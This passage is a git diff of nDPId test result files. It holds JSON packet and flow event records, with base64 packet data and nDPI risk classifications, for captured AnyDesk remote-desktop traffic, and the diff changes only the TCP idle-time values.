Js2X7eYc\/nVFim9OR2M271rHHTTGmofiA2qRYewVfivK4+jJV2algoPfe78BQVj0lYL8HSL2ZIOVwb7WccV+mHgXVjcaDr8VeGILburQoLgZ3L3Rh6dBmFRFNDAM2F5UvL6rcbC48HPxdFN16gQFsf4yKqOfuTQa4qvxxMeVacwMBH8TyGwIqHd+Tu1k9SeZW9JzAKZNOepT64wLCYsAHDNfrvua7\/DM3Er3\/3ogYsTLe+cEnrJEF0jzT\/pW3BeJvaGd27aJYiI4XXscQqB8hOAXO5tAOPRO2w7cv7WHSnJd8ikF\/boKhx3DSbhEgqQliEpDTKXvGDhrGJ1aXzM83ENzYdrp3w\/qh\/Nf3lFU96DuSvh49grWDQkMeDDWWwXeT35tZD\/9i4Y5fFpZIV6SuRwn5p+R9aNHdnQ\/kTb4S4uHdPEUKPQjKs\/yJMUGcPxicPpB\/EisjPsJJbm7W1mTHU7MIIM\/vWf97H\/qvxLJ4+6dpF7eBxBYIXZp4vqqyNXSe8fXlScBOjZ7KGFq3h5Lsv1iilvMraMq1ISyI1SMlYMJGCypO+r7ZEXKXhAC9eCXv97ngQmCSfOC8yQy0BHfYcR\/GagdbDhHp52TBPv540aa8roHZiDYWEAvRy60ik6jCvbpXWcGapjEPyt9GESjgevqZXh4ByQjZeQa5WOr7Cz5wUS6XJhwdm1wGwlzD8KaiSP5C7Dw5lq8A3RtUTSDSCTiMVWNgdjSc74MQ1jk1g8XF1QA5oCCJKcd6baWRIcuCXGejHzwU++HX+sLNBXpzgm6BOkdcw1rBrXndG\/g9wtAODPp1NIebGIUBA8bwWYJXy3f1MwWV73BLyP6xUng2u8pwIPJ\/w72lzBfeximEN581Pmbzit7uC+88wlAlAmE13UPXh2L6jM7HCsWpxaF79JpkSrnInn8vub5LDlOlRQ7oild8fQrhrbGarKIIrNCdhLZ5aouS96b\/KyopW16Xv2Rc9xFrgSg4ci2RYHCemJZwYuTROMsSoM5X52hZZrrjU0vBuzfjvVO+GgDyIKa39Yoeu51MP+qfWqjdDBZ1wgSVjTNfz3TIE4A4KMb6Cl63\/6TRFZUpnIyceUMCe2IP0kvk+YgXulkcSi0emPStQ4WpWgV8klz3n5cpS0yt5Idvkv4l6FdXHq3kxH\/XTM0niEe1M+4lFJRaB7IvrjklA67KYKUY8KCZs1yVLV3iBzYHV5q5GSPmymAagTbSS0ArTqr6BOKPdX1u6z4BG07x613PW2TE0ODR3DvxyFC+10nNZR4enZpsOrMGbqDyW9yidkPDpiZBhlp7NXIKAxPzV878YoFs420WX+nCtL2rHv69VOeWflwR0tlbrBYDRasBj4Ozy\/MWHHB47HxGgEI6rEo7Bj5A2l4qkAQCBvGYxXrIir5l6wMCH5LO77vM3yVRBZzAmxfDBn1PMfrss3MsnCyKM82azzo1KByvjM7tt+seSzjL4zKeYnBAxt+gpQU9gpBmPO+jlfaa9EfPfXktD24k\/Au+q4dpgZ1kpHdHuNvbEoLWf4GbGEXFcLbRQ85jia+McSrUdVt+gCMMtB4Z9SCaHAATa2UM61MTkweYPjRngskZ+R0ZbPdiORtd\/SbSRFFhpzIJQz\/AsvpOkr6s5utvDByWbKYa8AqQ5Aykc6oJPNVOD8KWUse+gAsIa9vlmRZ2iuMVUUTUHOCazB5EZoseBAlmJ6oc\/B7nctTpL8LmbkTXwj68y1leVMVm9D7vjM0tFwFKja+2ONbRpfRIA0sktOr3ZvqxUJGcKVycsKY4vIDIm5kACo\/TDsPHtL7PoN4CClvCb8kjCdjOHPLu5cD8\/KrvTkAZQtVA9VWz5+hm6Mn+hLgQ7KSw+5NALvBMuWC6ovDO6koaEtI2D2rO5ztN9to\/hy5AEOOCwgnKfOrVYxrml8DM25Ysz0X38zW4Qz+G8fq5qUeDUSWUU\/IZSqDcQC8mgi3n5p\/p3YhvfkfrkJ6vJ6nVIZUWJz+bMTfErsyHKmeoj9Msh7Aw8bNmpqeGEZ8xu1teQ+exP9+TZQWquTpbn2wxK+\/5ziA7OY65TsT44gP6mGlwQXUAUkahCLUd7kfyBjIF5qBtrkbgi0KWQKd4ZWhuLu+o1+dEax\/z5uTA3urCjHPw0CaCWul6eJRh3p18p2GsUeY4YB9AMOs6obyiagcUi+oA8XKl0J\/kC\/2EFYc\/HIECCxc1R5p3Gk8JuXKm8r2pNgmzqVHeTbatHsxapPWERfMh+XtO+ldcvlOBTbgmWeBcfYHu\/js8wOgUStGstFxbu2OwXllx7VU5MkxPvRFteV4cLNjNG+Id35MmSnXrcEEbVEy9p5gZyxXyq79oDrnZ7vw8\/SKfhclqXWwkXIN6Akam13SxsIVdOq6NRuhb01xYXSgIxM7\/qsEwNyCKMzME+EsFyX75nzo4KlkLJdg1M+SYi8T9Ap2MqlAfzWI\/v2YvtEkM0hvK5LqtBgjXdhrrI0roG4RmfJlj+Ll72KiZd+UDQij1bY4IJW4KPauCJZxtpa2lYjenAgTHYgVFVhcxwH6E2QRwdKyyOCSg8BGs+6dP40kQS1hBBfHQsZjaJFUIaEDwoxe8AsdTjTJMdJ+GmcOB2KxLQXTaPKW6EcRL9RPDlWxhV+b5B2wd2Xe7ELG4B8qwKMuIQSfGNkahaIGKLVDksKlHnHebxupiKOsN4L5M5MukkAhKJbldgHZVeYxLih\/FbNPzwMXZ6WJV2P3OausnccFHvzYhRmiN2BsLGpyEh7aonio8QblciYgEQett8fFtbOAKB5idHPPMJme3uSPo25PTlsI4AO8="} 00206{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":66,"source":"anydesk-2.pcap","alias":"nDPId-test","l4_data_len":4158,"global_ts_msec":1613977602724} @@ -898,8 +898,8 @@ 02465{"packet_event_id":1,"packet_event_name":"packet","packet_id":2511,"source":"anydesk-2.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1615,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1615,"pkt_l4_len":0,"thread_ts_msec":1613977618195,"pkt":"KDc3AG3I2MuK4S0uCABFAAAAiTdAAIAGAADAqAG7wKgBstOUG56PNprJWcRUSlAYIBKExAAAFwMDBhRZ4hNO+msXhlYwLW3r7Wf6fxRwlnWsYmV1WuMmbomyRakhOPMItw4V+Bwe9c2kioNcoKfHSWYqqeTE0ksEvnbqcFDYrid1VrjOOjcB\/nDr1c6HLfTQ3QEJ+Lm3fUR7zGIoAQ20zm9sQuwh0owamzzcAZywgeryapRfhPauo+S3t1P6mAQJVWmQ48\/m4laoXCHpx\/ZNXM7OGlpLxi\/GQ8e0cJZKbOpdXoIavUAWim5AZib4XY4litUKtw4uWshG5QPwWaUM3Ae6cz4D6CHe1pqPJC1PHnOmoJf5zYUg8KPhyov\/VN+rFTCbG8LCc5i55m0UDUzi6HlDdA1\/um7ZW442jB6ekb1jf90bfj9J8MvGM+090gB\/kXjCbyWhMrL2DGjF1CnqO2XHEafShcUOcIkiODG38mrxp8HmyusfYW6rowpNIJnORNMONHHZbt3ayv\/4z7Z78J4iS0derQB3do+weMeQwvbqwCPKiG8HO\/My5pAhxZ+o+I9I2N9ae4X\/Y8ocpQzKB7UbCm33gA7ZKtGwp7hY5YDVTThQeofIBnnETAVcInayA1wEq9gzcjRWDzj65fgvgfC7bB7JGd8S31fOCYiB2C63dEN8pSUcU+zWvjBnr0yNDH\/EkdjjmHsEO27b5wzXb7nVEX4hJTivJz4gw4o24bftDjS4zWx60B6U9i1vyzDDxitDWw0syEsstIpaURjH7ITxa3j2r+Nq1ff9t5sYMhNTW1zTV8ejXZXGpcyKHnimylgLOExKqaUoPs16P+gMXU1GoI\/QE11V6YNOdd8IOEwfXDhTFoNhCeHMRJIOEzjnsXX3irYjMNbjsCLkkdlo\/nmoAZRRbXIP8PR0DTaNKVCvH\/lBUmaMtmedJixVqqmW062iw3kPZVBh4lYRL3jomCTu5FZesvQteJKNV3Y9Omt9+GTDIzlVG7zGyTcep4kvQZ+Sof0EGR+uV5xP2hazfvAz8bw97Dmd26aaaPR2WZIF1Uw+gGTwUwycAm2HqwBMk9KpiHOG3rT9CRBLDozpd3poBCJuMzVqYxiRw1YBNMFVnCO72mFgH53hHmJTq1CuUfqvIlcxkXFRcD1hsNPoBeMkC+gANksenOjfj4QgnxGFkLSXfYz7QAFchs27aWCjwTDiL2hPNRIFMhowA3TpiZOyPOk1j7P2qbmqZS2RY+Wg+Xr8G33bDwQJjOvaNoQoQyrMw6Km4P5SULr\/OoUfKqTYt8sacsFFgE2dhFX0aLmCR6nfj\/qavtL9bRKEw7331Hs8YJudmup7h9GKKnTwDORPRpBZbTdPW2pLXPpGMrITNeH8Czvvgrr2lAzsrODPWTSvUxAh2Sz5CcZbfx\/EdeHpFfCb1FoYkhZVl7ezj6yCSrZx2416BPENSMorhwoqdOcsi0RX5Ko3gKJwgGQKCkOa3Y0U8YcQSyWkfspdvGj3yxoveY2XqaLegd+qhmlB6N01PSLQoRemcRbyXnyxGr\/viRnWKQzZZPgg5TK4govdljpGh5dEn58vUYSwcKY8WhCjIzXrUYvrwQK4bE9HWyXw01GJmzdskpPgwYEzXQes\/tei\/r\/gUNhca777WhFTPj7c4vuisP\/hv2tOmFJDwXxgo15XcCi1ewFXlapQj2HV+tzOlUmBYwgYK7uFPfywo\/1wliiixPUz\/xHDN\/qGbzonHbrNJyXBEThhvK7H1on6XYKBCxUkx20ivR2AfZ7rojhDTeGD1othoXrjyHmj9rz5O5kE85xR4kAd6B40PTbS2D3FCfDE0r+S\/Y0coeGWLkUBTq7Mldu8aosM7O+tiy+nq5Ia3VGBq4NueTbqxQEj4\/FXfKJdTDfYicstfUhtAv0hpUILpFNfs+vduW7hyb\/6EsKXtoi\/PDM45oQJRdBmH34HpYyIYxnAy\/voJip9OCWOtW6uugZUHWyjl8MC8UGZwP0Lg32K2WtshJaLkBRK4jTkSjp80e6d\/CyeKZCTvZGOA1WpiFYxxn2IsKaToy5iPEEifX5xFRC8L8mqCJWZLWdbIKC93YrUmoQVxHMjgz6VhN1FantUqJ9VC0oAD\/1ydh9UtojQUE8zFGj8Vw=="} 00208{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2513,"source":"anydesk-2.pcap","alias":"nDPId-test","l4_data_len":2146,"global_ts_msec":1613977618195} 03224{"packet_event_id":1,"packet_event_name":"packet","packet_id":2513,"source":"anydesk-2.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":2180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":2180,"pkt_l4_len":0,"thread_ts_msec":1613977618195,"pkt":"KDc3AG3I2MuK4S0uCABFAAAAiTlAAIAGAADAqAG7wKgBstOUG56PNqDiWcRUSlAYIBKExAAAFwMDCElZ4hNO+msXh2bUnODOizPQiAddzId5s0L6Tw4B2tyJ0YG6Lk9xeCjCkk5iyV\/TcZ+MkCeyOMxeyKngR\/0L81CbJvcp2HY5+PJ99RjORMM0hFqL0M9FsClysAMVqzfPzL0uTI+AMuQYjmp2qqS3n0jD5Mc\/OI6AQf5alcy5blcc+SRlMpLpNTjaoZqhbqyN2OjZAQ0RCghY1jgDpcpPpjzXwFfM+eUtNLtomqzUozUMvSGBCPubR8ysHpKf08rz9nQsYe\/eQy1W+fGZ3UevRU4e0ziP\/Z4ImlVCjTNEZ4Q1m5e1dfxc\/2iPO\/xRUkfR9tTq5C7ck1L6BG5Sbs7srBImqkQCfZO0borStlxpNfdnOV3FAeKPjPu+OB0GQFdSoxU3ShgSCS+s3yhVPiImHbrFfcRtfPcymodIF1QSeUI\/b4QvFBs1xUsetwKnOpQQqQSJnJmm5p8kAXEr+E17QnDNbQ7YpszC1yHmy8ntEIl3A784f8yXufRNOYJFir+O43BaD0qfe\/E8ybQFEb\/wMzNxH0PbiaGM6fZuRxuetCSAU5wDWUE+emEiVkHNdRsVQGRAbJoutoRZnkFzwA6CyosjbLdzxuScaUYQtz\/x4oANzVRMAMzmVJ4c5nalbJW8JxLGB5MZQ9JCVYtUqHLLUdCfyU4E4HlGdK5rNarSj3ruUr+\/5kCGel2xiNIDS+c9xxjT8sS4zj8gfHVq5EP7LPuFyWrTkRmqr600UXyM+yqOFXwyU43fpvj4RXm\/bDgFfkcz2MeJFCky7zPaaOAskDznNnLRmqzyBHEcnqVNwNVWmZnSPzmAPX1eSxSk78DEv\/4pC1Zw33pmGNtPqwzbm4adGRSJMpXA1ESn83MO5nw2tlad\/f6XtHIDIIFcAd2ybubKHggF1GlVj0fZ3rkpkpXpbeP4HjVWCmpZlmt5hrqOnYKCXIoA9d5Q9eU9x0bDgEw8UsAs8Z2cGt7PGrb+Qv7bmsIIrtbYJoehXXLytxGqTyGFHgdtZ1iR39hZ3t83j6Mygm3lc680av6XxYpuCod\/9ENBc+yDd51\/4a1SVvyKfKpS1J1NPGkdCHXxqze5lGusMv4rpLextd++aXgXm4pp8tC9u7v0Y3ESoZOdsgdZjwRtBAwxPUuMR+bTiGlzmFAWnBxEgtA8qwqoeJ8fN2BBhxRSoyiJIjvIbrD\/ViWh8M6a5vCi9FaH2BHmTSkUujKoS4Ui05Uf0s+HwGa2T\/ncn+QF0sBjLTpC3akoGTkw2dqmGtGGg9JL9sxQrC3Z8P2+K0kklga\/87NYKb1gwl8HI5zrx04BnBtRZsYBSRVsc1GywvAc13NndpSo5neCnmnBd\/1I9+HIxUef4wi7p4C66Y0I2booJeN+ZoBGc\/1Y4vtaXbEsPJKJMDqB+BLCw0nSvSbDYYxB91phOhOel5GanFtMg+9nyM\/3XGQvKxO8noAo3CMoOyP7NgQIfjHvFH8Bz6xZMI7QqDGNnOF1uX5CACJ7YsOw8FPJLyQlYtZFFGiMTTrapto3gMpziUDCXvss50gfevS3poRlxl+s6OS85vpXalhuTHFjf8vGxSXfWFquDf1RFg9CUy8zk9PSl1vxgrx0OTqElj9oGT3+Vx3qZgn2bqf+592wbJFWx25hJrBNvBVEbn+OJNrZuuEh1HCoz98Rw4ULrJKM3qfOdDRZ2usK\/f4PyleqeEhwP7aUVZX0wKYFXL2UxfGiK7yY36SpPBq3Ln32t6dvMpaObtqNj+Kfr4ImRxmqQhe0B5zTHV67SrOYPC5E+e3BuEgNN6g9Xu7lBtLjFEUVfT\/s+OSTv0ASorfZmSXHEGDDlch1PtzQNW9Rg1xFAIoMDwxtBj3jiKEIJKWJ2FNgC2FjB+FshqIdc1deJTLE2ymgSABs\/nFAcJERH5Eh8SDc80l1fUqtgee0KKG7+UiEYG9HBLhxrjLYpW6nqwKOnP5iS5J75eSdcaJPQ2RCDoI48f54M\/u0C5mjF4KxZWfbF6W+LA7ItzNMe\/dXWOBsTFS8qH5T20g\/3IZenJtIlcn5ix8kqRSNhmkt78WK6PYEC8Frnz87GbQ2+TF1AIO24YEByT38EkpPfVZBJEKa7vsROTk\/wrD31hqsKtZVqrDC7NcjVOE7GiftEXF+1sA8Yo1W\/gcl71x2tP6c6oxG0OS7vSR61oZ9c4wtxmZsalZYl9wvy0wjtzOgCqQPbk69W7bNvn1ZXADwPJ8YWuzH9z1aPWM2csOqghu72ChTMW2zQtB\/qGY49wPVNjYcmbEB+443LWlsFCjcunDLVmzxVAIJIet9kbYse0PhUurR66Ele1UdzzsBsHU08\/5dPnbKk+8hDJCPyIztDNktODA9+bPmDu8JJ2UixUjK4TEzkxYFIQMx0hR4gryqlUJRl1sbbMr7VctjZdbpqLiiFuSagY+pSdIQ8GPFcdtrfWsXnDYoiBXJ\/5j+UKyYU4B2pUY38w+mhHW38VyltT030eEtueb0ipynzmIgzRdJZ\/W7TPMibiy2oykdpbb6SZ1ujx16jzA3iU7pPElUkIOkKOSxtREPgbzIlknPYKGoBQHdq0GpxSL0i9d7GU7NtI2fcQYpwP4X\/sj3JNdosmuOXAeEPYsSMWQmH+qrj6FSm9gE+WhZfWc2hGNRD7Y6OGdYaU0Q60pRVRul0FACZqyMrb5y97MpVuuqRxKzn2r7P+Z+KtgKO7S7rNMVQmOq0tVktiH\/Ws836Z6\/328nnzLauw2NXRu0qwbtytvVv0f2sBuTbqbURJET4ciDSSyF7wux7TlhQsY\/qPPlXKBUkVGHetfK0nSty5hsQc12nShr9kuLAog="} -01300{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1613977595407,"flow_last_seen":1613977595964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1286,"flow_tot_l4_payload_len":3316,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} -01202{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2064,"flow_first_seen":1613977595379,"flow_last_seen":1613977618224,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":223587,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} +01300{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1613977595407,"flow_last_seen":1613977595964,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1286,"flow_tot_l4_payload_len":3316,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} +01202{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2064,"flow_first_seen":1613977595379,"flow_last_seen":1613977618224,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":223587,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613977585542,"flow_last_seen":1613977585553,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613977585247,"flow_last_seen":1613977585260,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","packets-captured":2521,"packets-processed":2083,"total-skipped-flows":0,"total-l4-data-len":227127,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":4,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":905,"global_ts_msec":1613977618224} diff --git a/test/results/anydesk.pcap.out b/test/results/anydesk.pcap.out index 2a1d2ef4e..d2b63fab1 100644 --- a/test/results/anydesk.pcap.out +++ b/test/results/anydesk.pcap.out @@ -1,19 +1,19 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"anydesk.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1591342198821} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342198821,"flow_last_seen":1591342198821,"flow_idle_time":7440000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1591342198821,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1591342198821,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1591342198821,"pkt":"AFBW5dKtAAwplUdeCABFAABbtopAAEAGCwXAqJWBM1PvkI3\/AFB7i54qMVwSUlAY+DR5WwAAFwMDAC7mz9mv7V5op8uDzrVlyYzGPOa22i4SIRv\/ctzVUMWyqJzhwIdSdK\/Qd7DJrcKc"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1591342198821,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1591342198821,"pkt":"AAwplUdeAFBW5dKtCABFAAAoe1AAAIAGRnIzU++QwKiVgQBQjf8xXBJSe4ueXVAQ+vBP7wAAAAAAAAAA"} -00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1591342198998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1591342198998,"pkt":"AFBW5dKtAAwplUdeCABFAABYtotAAEAGCwfAqJWBM1PvkI3\/AFB7i55dMVwSUlAY+DR5WAAAFwMDACvmz9mv7V5oqHbrZghdQbdzwBFFDzsTJ43BfdwI8acT8HfThIVfMXtYD9Ln"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342199201,"flow_last_seen":1591342199201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1591342199201,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1591342199201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1591342199201,"pkt":"AFBW5dKtAAwplUdeCABFAAA8CJBAAEAGudPAqJWBM1Pu26oPAFApppzyAAAAAKAC+vB4hwAAAgQFtAQCCAqukMx3AAAAAAEDAwc="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1591342199366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1591342199366,"pkt":"AAwplUdeAFBW5dKtCABFAAAse1UAAIAGRx4zU+7bwKiVgQBQqg9odWR8Kaac82AS+vDm4QAAAgQFtAAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1591342199366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1591342199366,"pkt":"AFBW5dKtAAwplUdeCABFAAAoCJFAAEAGuebAqJWBM1Pu26oPAFApppzzaHVkfVAQ+vB4cwAA"} 